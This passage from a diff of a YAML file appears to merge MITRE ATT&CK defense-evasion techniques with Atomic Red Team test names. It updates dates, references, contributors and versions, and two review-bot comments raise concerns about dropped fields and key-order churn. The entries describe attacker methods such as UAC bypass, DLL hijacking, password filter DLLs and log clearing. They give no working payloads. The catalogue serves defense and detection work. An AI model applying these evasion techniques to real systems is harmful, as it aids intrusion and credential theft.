url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests:
- name: Loadable Kernel Module based Rootkit
@@ -1784,7 +1868,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1821,13 +1905,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
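Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from `T1036.007` without adding a replacement, so the entry ends up with no ATT&CK spec version at all. In the `T1564.008` hunk above the `x_mitre_attack_spec_version: 3.2.0` line is retained, and in the `T1574.011` hunk below the field is removed in one place and re-added as `x_mitre_attack_spec_version: 3.2.0` later in the object, i.e. moved rather than dropped. The same outright removal happens for the `T1548.003`, Weaken Encryption, `T1562.009`, TFTP Boot, `T1070.002` and `T1218.004` entries; please confirm that upstream really no longer provides the value for these techniques rather than the generator silently dropping it when the version is 2.1.0.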
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1928,7 +2010,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1959,7 +2040,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1993,8 +2074,6 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests:
- name: Sudo usage
@@ -2112,7 +2191,7 @@ defense-evasion:
sudo visudo -c -f /usr/local/etc/sudoers
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -2164,12 +2243,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
@@ -2249,12 +2327,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -2273,7 +2350,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -2287,7 +2363,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -2314,8 +2389,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -2346,7 +2421,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -2403,7 +2479,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -2456,7 +2531,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -2472,11 +2547,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -2522,8 +2596,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -2533,9 +2607,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests:
- name: Execute a process from a directory masquerading as the current parent
@@ -2587,7 +2660,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -2611,8 +2684,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
@@ -2676,11 +2747,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -2701,8 +2771,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
@@ -2746,12 +2816,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -2771,9 +2840,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -2793,9 +2867,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -2812,6 +2885,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2845,7 +2922,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -2895,7 +2971,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2923,8 +2999,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
@@ -2967,7 +3041,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2991,12 +3065,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -3086,13 +3158,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (Linux)
@@ -3143,7 +3214,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -3168,8 +3239,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests:
- name: rm -rf
@@ -3389,7 +3458,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
@@ -3415,8 +3484,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -3468,18 +3535,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -3495,8 +3561,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -3510,7 +3576,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -3536,6 +3602,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -3563,12 +3633,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -3664,7 +3733,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
@@ -3731,7 +3799,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -3796,11 +3863,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -3861,12 +3927,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -3892,7 +3957,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -3934,7 +3999,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -3976,7 +4040,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -3999,36 +4063,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
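Review bot: the removed block at the start of the T1556.002 object (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) is not actually deleted; it reappears in the following hunk with the same values in a different key order, which makes the diff look like a wholesale rewrite. The real changes to this object are the `modified` bump to `2024-08-21T16:16:18.271Z` and the fields changed in the next hunk. If the generator can emit keys in a stable order (or the same order the upstream bundle uses), future refreshes will produce reviewable diffs instead of this churn.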
@@ -4052,22 +4091,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
